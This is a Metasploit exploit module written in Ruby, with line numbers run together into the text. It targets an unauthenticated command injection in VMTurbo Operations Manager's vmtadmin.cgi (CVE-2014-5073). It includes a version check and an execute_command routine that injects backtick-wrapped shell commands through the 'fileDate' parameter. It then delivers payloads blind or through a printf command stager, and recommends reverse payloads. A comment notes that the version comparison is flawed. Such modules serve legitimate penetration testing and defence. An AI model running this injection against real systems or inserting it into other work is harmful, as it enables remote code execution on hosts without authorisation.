Path: blob/master/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
33276 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10include Msf::Exploit::EXE1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',17'Description' => %q{18VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated19OS Command injection in the web interface. Use reverse payloads for the most20reliable results. Since it is a blind OS command injection vulnerability,21there is no output for the executed command when using the cmd generic payload.22Port binding payloads are disregarded due to the restrictive firewall settings.2324This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and254.6.26},27'Author' => [28# Secunia Research - Discovery and Metasploit module29'Emilio Pinna <emilio.pinn[at]gmail.com>'30],31'License' => MSF_LICENSE,32'References' => [33['CVE', '2014-5073'],34['OSVDB', '109572'],35['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']36],37'DisclosureDate' => '2014-06-25',38'Privileged' => false,39'Payload' => {40'Compat' =>41{42'ConnectionType' => '-bind'43}44},45'Targets' => [46[47'Unix CMD',48{49'Arch' => ARCH_CMD,50'Platform' => 'unix'51}52],53[54'VMTurbo Operations Manager',55{56'Arch' => [ ARCH_X86, ARCH_X64 ],57'Platform' => 'linux'58}59],60],61'DefaultTarget' => 1,62'Notes' => {63'Reliability' => UNKNOWN_RELIABILITY,64'Stability' => UNKNOWN_STABILITY,65'SideEffects' => UNKNOWN_SIDE_EFFECTS66}67)68)6970deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')71end7273def check74begin75res = send_request_cgi({76'method' => 'GET',77'uri' => '/cgi-bin/vmtadmin.cgi',78'vars_get' => {79'callType' => 'ACTION',80'actionType' => 'VERSIONS'81}82})83rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout84vprint_error('Failed to connect to the web server')85return Exploit::CheckCode::Unknown86end8788if res and res.code == 200 and res.body =~ /vmtbuild:(\d+),vmtrelease:([\d.]+),vmtbits:\d+,osbits:\d+/89version = ::Regexp.last_match(2)90build = ::Regexp.last_match(1)9192vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected")93else94vprint_status('Unexpected vmtadmin.cgi response')95return Exploit::CheckCode::Unknown96end9798# NOTE: (@todb): This PHP style comparison seems incorrect, since99# strings are being compared and not numbers. Example:100# 1.9.3p547 :001 > a = "4.6"101# => "4.6"102# 1.9.3p547 :002 > b = "10.6"103# => "10.6"104# 1.9.3p547 :003 > a <= b105#106# Also, the description says 4.5 is also vuln. This doesn't107# appear to care.108if version and version <= '4.6' and build < '28657'109return Exploit::CheckCode::Appears110else111return Exploit::CheckCode::Safe112end113end114115def execute_command(cmd, _opts)116begin117send_request_cgi({118'uri' => '/cgi-bin/vmtadmin.cgi',119'method' => 'GET',120'vars_get' => {121'callType' => 'DOWN',122'actionType' => 'CFGBACKUP',123'fileDate' => "\"`#{cmd}`\""124}125})126rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout127vprint_error('Failed to connect to the web server')128return nil129end130131vprint_status("Sent command #{cmd}")132end133134def exploit135# Handle single command shot136if target.name =~ /CMD/137cmd = payload.encoded138res = execute_command(cmd, {})139140unless res141fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")142end143144print_status('Blind Exploitation - unknown exploitation state')145return146end147148# Handle payload upload using CmdStager mixin149execute_cmdstager({ flavor: :printf })150end151end152153154